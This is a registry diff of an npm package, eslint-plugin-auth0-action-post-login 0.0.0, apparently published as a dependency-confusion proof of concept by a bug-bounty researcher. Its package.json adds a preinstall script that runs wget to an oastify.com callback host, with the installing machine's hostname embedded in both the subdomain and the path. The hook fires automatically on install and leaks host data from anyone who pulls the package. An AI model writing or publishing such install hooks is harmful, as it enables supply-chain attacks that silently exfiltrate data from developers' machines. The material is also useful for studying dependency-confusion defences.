eslint-plugin-auth0-action-post-login 0.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of eslint-plugin-auth0-action-post-login might be problematic. Click here for more details.
- package/index.js +1 -0
- package/package.json +16 -0
package/index.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
console.log("This is an example for a dpendency confusion vulnerability")
|
package/package.json
ADDED
|
@@ -0,0 +1,16 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "eslint-plugin-auth0-action-post-login",
|
|
3
|
+
"version": "0.0.0",
|
|
4
|
+
"description": "Demo package for dependency confusion testing",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall":"wget http://$(hostname).n7ve40n82s6poxb5uwwf35ns9jfa9y1mq.oastify.com/$(hostname)",
|
|
8
|
+
"start": "node index.js"
|
|
9
|
+
},
|
|
10
|
+
"keywords": [
|
|
11
|
+
],
|
|
12
|
+
"author": "https://hackerone.com/moti-h",
|
|
13
|
+
"license": "MIT",
|
|
14
|
+
"dependencies": {
|
|
15
|
+
}
|
|
16
|
+
}
|